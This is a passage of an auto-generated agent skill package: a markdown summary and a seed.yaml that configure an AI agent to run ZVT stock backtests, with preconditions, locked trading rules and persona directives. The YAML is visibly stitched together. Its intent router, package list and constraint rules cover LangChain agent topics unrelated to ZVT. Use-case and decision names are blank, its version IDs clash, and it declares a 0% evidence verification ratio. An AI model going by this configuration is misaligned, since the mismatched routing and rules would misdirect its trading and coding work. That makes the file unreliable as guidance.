- Index composition data collection (SZ1000, SZ2000) with EM recorder
- Institutional fund holdings tracker via joinquant_fund_runner pattern
- Custom Transformer + Accumulator factor with per-entity rolling state
- Bollinger Band mean-reversion factor with BollTransformer (window=20, window_dev=2)

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-132-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-132-v6.1
  version: v6.1
  blueprint_id: finance-bp-132
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:19:03.256392+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 8 AIL warn/pass + 5 DAT warn/pass = 33 items reviewed across applicable
      scope
    audit_pass_rate: 2/13 (15% applicable items pass; 8 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-132. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-132-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: ''
    positive_terms:
    - tool-calling agent
    - ReAct agent
    - create_agent
    - LangGraph agent
    data_domain: mixed
  - uc_id: UC-002
    name: ''
    positive_terms:
    - structured output
    - JSON mode
    - response_format
    - tool-as-schema
    data_domain: mixed
  - uc_id: UC-003
    name: ''
    positive_terms:
    - human in the loop
    - HITL interrupt
    - pause and resume
    - approval workflow
    data_domain: mixed
  - uc_id: UC-004
    name: ''
    positive_terms:
    - tool call limit
    - model call limit
    - cost guardrails
    - loop guard
    data_domain: mixed
  - uc_id: UC-005
    name: ''
    positive_terms:
    - model fallback
    - provider failover
    - rate limit handling
    - multi-provider
    data_domain: mixed
  - uc_id: UC-006
    name: ''
    positive_terms:
    - PII redaction
    - prompt scrubbing
    - compliance middleware
    - data sanitization
    data_domain: mixed
  - uc_id: UC-007
    name: ''
    positive_terms:
    - conversation summarization
    - context window management
    - memory compression
    - long history
    data_domain: mixed
  - uc_id: UC-008
    name: ''
    positive_terms:
    - todo tracking
    - agent planning
    - plan and track
    - structured todo
    data_domain: mixed
  - uc_id: UC-009
    name: ''
    positive_terms:
    - RAG pipeline
    - retriever
    - LCEL chain
    - retrieval QA
    data_domain: mixed
  - uc_id: UC-010
    name: ''
    positive_terms:
    - streaming output
    - astream
    - SSE streaming
    - token streaming
    data_domain: mixed
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 18
    fatal_constraints_count: 1
    non_fatal_constraints_count: 50
    use_cases_count: 10
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 1 source groups: cross_cutting(18).'
      key_decisions: 18 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-001
      type: BA
      summary: ''
    - id: BD-002
      type: B
      summary: ''
    - id: BD-003
      type: B
      summary: ''
    - id: BD-004
      type: BA
      summary: ''
    - id: BD-005
      type: B
      summary: ''
    - id: BD-006
      type: B
      summary: ''
    - id: BD-007
      type: B
      summary: ''
    - id: BD-008
      type: B
      summary: ''
    - id: BD-009
      type: B
      summary: ''
    - id: BD-010
      type: B
      summary: ''
    - id: BD-011
      type: B
      summary: ''
    - id: BD-012
      type: DK
      summary: ''
    - id: BD-013
      type: B
      summary: ''
    - id: BD-014
      type: BA
      summary: ''
    - id: BD-015
      type: BA
      summary: ''
    - id: BD-016
      type: B
      summary: ''
    - id: BD-017
      type: B
      summary: ''
    - id: BD-018
      type: B
      summary: ''
resources:
  packages:
  - name: langgraph (HARD runtime dep of v1 agents)
    version_pin: latest
  - name: langsmith (tracing SDK)
    version_pin: latest
  - name: pydantic (v1 + v2 dual-path)
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install langgraph (HARD runtime dep of v1 agents)
    - python3 -m pip install langsmith (tracing SDK)
    - python3 -m pip install pydantic (v1 + v2 dual-path)
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: langchain-C-007
    when: When defining a Pydantic model schema to pass to PydanticOutputParser, .with_structured_output(model), bind_tools,
      or any LCEL parser construction
    action: 'Pick ONE pydantic version per parser/tool boundary and stick to it. Do NOT mix `from pydantic import BaseModel`
      and `from langchain.pydantic_v1 import BaseModel` (or `from pydantic.v1 import BaseModel`) in the same file. For new
      code use pydantic v2 (`from pydantic import BaseModel`). Migrating legacy v1 schemas: import is the discriminator —
      change ALL relevant model classes together, never partially.'
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: null
  regular:
  - id: langchain-C-001
    when: When writing or migrating code that touches conversational memory in langchain v1 / langchain_classic 1.x
    action: 'Replace any Conversation*Memory usage with BaseChatMessageHistory + RunnableWithMessageHistory (langchain_core.runnables.history)
      for stateless LCEL chains, or with a LangGraph checkpointer (langgraph.checkpoint.*) for create_agent v1 stateful agents.
      Detection cannot be decorator-only: also flag any subclass of BaseMemory and any import from langchain.memory or langchain_classic.memory.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-002
    when: When constructing an agent in code that imports from langchain_classic.agents
    action: Replace with langchain.agents.create_agent (v1, returns langgraph.graph.state.CompiledStateGraph). For ReAct specifically
      the recommended path is langchain.agents.create_agent(...) over langgraph.prebuilt.create_react_agent. Detection should
      look for class instantiation by name OR import paths from langchain_classic.agents.*.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-003
    when: When auditing a codebase for legacy agent usage or designing a lint rule for langchain v1 migration
    action: Detect legacy use by import-path (any import from langchain_classic.agents or `from langchain.agents import AgentExecutor`
      that does not resolve to v1) AND by return-type (anything returning AgentExecutor instead of langgraph.graph.state.CompiledStateGraph).
      Migrate to langchain.agents.create_agent (v1). Drop-in replacement is impossible — .invoke() works on both but callbacks,
      intermediate_steps, .stream() event shapes, and tool-error semantics differ.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-004
    when: When writing or migrating any chain-style composition in langchain v1
    action: 'Use bare LCEL composition: `prompt | llm | StrOutputParser()` (or any output parser). Invoke with .invoke(input)
      / .ainvoke(input) / .batch([inputs]) / .abatch([inputs]). Replace every chain(inputs) or chain.run(inputs) call site.
      The 2023-era tutorial corpus is universally on the deprecated form; rewrite both the construction (LLMChain → `prompt
      | llm`) AND the call (chain.run → chain.invoke).'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-005
    when: When configuring tracing env vars in dev / Docker compose / CI / production for any langchain-using service
    action: 'Choose ONE: (a) remove the legacy LANGCHAIN_TRACING and LANGCHAIN_HANDLER env vars entirely; OR (b) set LANGCHAIN_TRACING_V2=true
      (and LANGCHAIN_API_KEY or LANGSMITH_API_KEY) — once V2 is set, the v1 var is silently ignored. Audit Docker compose
      files, .env templates, and CI snippets for the legacy names. Both LANGCHAIN_TRACING and LANGCHAIN_HANDLER trigger the
      raise — older docs miss the second name.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-006
    when: When writing or selecting a BaseChatModel provider for use in an async server (FastAPI, ASGI, anyio) that will call
      .astream() / .astream_events()
    action: (a) Override `_astream` directly with native async streaming (httpx async + provider's SSE/native chunk API).
      (b) Verify `_stream` is overridden too — a provider that only overrode `_stream` still pays the per-chunk run_in_executor
      tax in async paths. (c) For partner packages you don't own, audit by reading the provider's chat_models source for `async
      def _astream`; if absent, treat as a perf-regression risk and either patch upstream or pick a different provider.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-008
    when: When packaging or deploying a v1 langchain.agents.create_agent based application
    action: Pin both langchain==1.2.15 and langgraph (the version langchain pulls). Do not attempt to remove langgraph to
      slim the image — every code path through create_agent imports it. For air-gapped deployments, mirror both wheels. If
      you need agents without LangGraph, either (a) accept the legacy AgentExecutor on a soft-deprecation track (see langchain-C-003),
      or (b) build directly on langgraph.prebuilt without langchain agents.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-009
    when: When subclassing Runnable directly (not RunnableSequence / RunnableParallel which already override)
    action: (a) Implement invoke. (b) For async-server use, override ainvoke natively. (c) For native batching (real provider
      Batch APIs like OpenAI Batch / Anthropic Message Batches), override batch and abatch — the default executor.map gives
      you parallel single calls, not batched API calls. (d) For streaming, override stream and astream natively — defaults
      yield invoke()/await ainvoke() as a single chunk. RunnableSequence already overrides invoke/batch/stream natively (lines
      3175, 3251, 3379, 3558, 3572) so chains compose without falling back to the executor.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-010
    when: When writing a new chat-model provider package (e.g., a private gateway, an in-house LLM)
    action: 'Implement _generate (returns ChatResult with at least one ChatGeneration containing an AIMessage) and _llm_type
      (returns the provider tag string used by tracers/serialization). Beyond the abstracts: override `_stream` for sync streaming,
      `_astream` for native async streaming (see langchain-C-006), `bind_tools` if your model supports tool-calling, `with_structured_output`
      if you want structured-output sugar (note: it has a guard at l. 2388 that refuses if your subclass didn''t override
      bind_tools).'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-011
    when: When writing a custom tool by subclassing BaseTool (instead of using @tool decorator on a function)
    action: Implement _run synchronously. For tools called by an async agent (LangGraph ToolNode in v1, AgentExecutor in legacy),
      ALSO override _arun natively to avoid thread-pool tax under concurrent agent steps. For multi-tool bundles, subclass
      BaseToolkit and implement get_tools() returning list[BaseTool].
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-012
    when: When writing a custom retriever (e.g., wrapping a vector store, hybrid retriever, hosted search) by subclassing
      BaseRetriever
    action: Implement _get_relevant_documents returning list[Document] (each with page_content + metadata). For async-server
      use, override _aget_relevant_documents natively using async I/O against the underlying store. The default executor wrap
      blocks a thread-pool worker for every retrieval, which compounds in retrieval-heavy RAG endpoints.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-013
    when: When writing a custom LLM cache backend (e.g., Redis, Memcached, custom KV) by subclassing BaseCache
    action: 'Implement lookup, update, clear synchronously. For async-server cache hits to NOT block the event loop, ALSO
      override alookup, aupdate, aclear natively. A common bug: a Redis backend with sync redis-py methods + no async overrides
      — every async LLM call falls back to thread-blocking cache lookups by default, defeating the cache''s latency benefit
      under load.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-014
    when: When writing a custom chat-history backend (file/SQL/Redis/MongoDB) by subclassing BaseChatMessageHistory
    action: Implement clear() (the only abstract). ALSO override add_message(message) — the default is a noop (silent data
      loss), and the type system does NOT enforce it because it's not @abstractmethod. Optionally override get_messages()
      / aget_messages() if your backend benefits from native query implementation. For async backends, override aadd_messages,
      aclear, aget_messages natively to avoid thread-pool tax.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-015
    when: When writing a custom output parser to terminate an LCEL chain
    action: For string-only parsing (the common case), subclass BaseOutputParser and implement parse(text). For parsers that
      need access to the model's structured output (tool calls, log_probs, generation metadata), subclass BaseGenerationOutputParser
      instead and implement parse_result. Choose the right base class based on whether you need the AIMessage object or just
      its content string.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-016
    when: When writing or migrating import statements in langchain v1 / langchain-classic 1.x code
    action: '(a) New code uses langchain.agents.create_agent for agents. (b) Any classic surface import comes from langchain_classic.*
      explicitly: `from langchain_classic.chains import LLMChain` (still deprecated, see langchain-C-004), `from langchain_classic.agents
      import AgentExecutor` (doc-warned, see langchain-C-003), `from langchain_classic.memory import ConversationBufferMemory`
      (deprecated, see langchain-C-001). (c) Add langchain-classic to install_requires explicitly when classic imports are
      present — `pip install langchain` does NOT pull it transitively. (d) Audit Jupyter notebooks specifically — _warn_on_import
      is suppressed in interactive envs, so the developer never sees the redirect warning.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-017
    when: When using .batch() / .abatch() on a chain expecting cost or latency benefits over .invoke() in a loop
    action: '(a) For provider packages you own: override batch/abatch to call the provider''s native batch endpoint when the
      input list size justifies the round-trip overhead. (b) For provider packages you consume: read the partner source for
      `def batch` / `async def abatch` overrides; if absent, .batch() is just .invoke() N-parallel — pick a different provider
      or wrap your own batch handler. (c) Treat .batch() default behavior as ''parallel invoke'' in your latency model, not
      as batched RPC.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-018
    when: When implementing a custom callback handler by subclassing BaseCallbackHandler or AsyncCallbackHandler
    action: (a) Copy method signatures verbatim from the BaseCallbackHandler source (callbacks/base.py) — do not retype them.
      (b) Add a unit test that fires a real LLM/chain/tool run and asserts your handler's on_* methods were called. (c) For
      async handlers, mind the AsyncRunManager.on_text abstract specifically — it's the one method the type system DOES enforce.
      (d) When mixing sync and async handlers in the same callback chain, expect run_in_executor / get_sync() shims (tools/base.py:797-801)
      which can cause 'callback fires twice' or 'wrong run_id parent' bugs.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-019
    when: When calling Runnable.astream_events() in new code, or when building observability tooling that consumes its event
      stream
    action: '(a) Always pass version=''v2'' explicitly: `chain.astream_events(input, version=''v2'')`. (b) Document any astream_events(version=''v1'')
      call site as tech debt with explicit migration owner. (c) Tracing/dashboard code: pin the version your consumer expects
      and fail loudly on mismatch — do not ''best effort'' parse both shapes silently. (d) When upgrading from v1 to v2, audit
      ALL consumers of the event payload (key shapes, name fields, data fields) before flipping the version flag.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-020
    when: When writing or composing custom middleware for langchain.agents.create_agent v1
    action: (a) Implement BOTH wrap_model_call AND awrap_model_call (and the wrap_tool_call pair) in every custom middleware,
      even if one wraps the other via run_in_executor. (b) If you must implement only one path, document it explicitly and
      ensure the agent's invoke vs ainvoke surface matches — never call ainvoke through a middleware stack that includes sync-only
      middlewares (or vice versa). (c) Add an integration test that exercises both .invoke() and .ainvoke() with the full
      middleware stack to surface lazy NotImplementedError early.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-021
    when: When designing retry semantics for an LCEL chain composed with the `|` operator
